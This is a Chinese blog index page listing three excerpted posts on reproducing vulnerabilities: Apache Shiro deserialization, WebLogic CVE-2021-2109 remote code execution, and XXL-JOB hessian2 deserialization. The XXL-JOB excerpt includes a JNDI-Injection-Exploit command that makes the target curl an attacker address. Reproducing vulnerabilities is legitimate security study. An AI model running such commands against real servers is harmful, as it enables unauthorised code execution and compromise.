liangzai6

2021年3月9日

摘要：环境 jdk：1.8 shiro：1.2.4 Shiro简介 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。漏洞原理 Apache 阅读全文

posted @ 2021-03-09 18:25 liangzai6 阅读(4508) 评论(0) 推荐(1) 编辑

2021年1月23日

CVE-2021-2109 Weblogic远程代码执行漏洞复现

摘要： 2021年1月20日，Oracle官方发布了漏洞补丁，修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中，攻击者可构造恶意请求，造成JNDI注入，执行任意代码，从而控制服务器。影响版本： WebLogic 10 阅读全文

posted @ 2021-01-23 00:19 liangzai6 阅读(596) 评论(1) 推荐(0) 编辑

2020年12月6日

XXL-JOB api未授权hessian2反序列化复现

摘要：环境： XXL-JOB 2.0.2 1.开启RMI服务 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "curl [Address]:5555" 使用最后一个。 2.生成Payload java -cp mar 阅读全文

posted @ 2020-12-06 17:30 liangzai6 阅读(1300) 评论(1) 推荐(0) 编辑

公告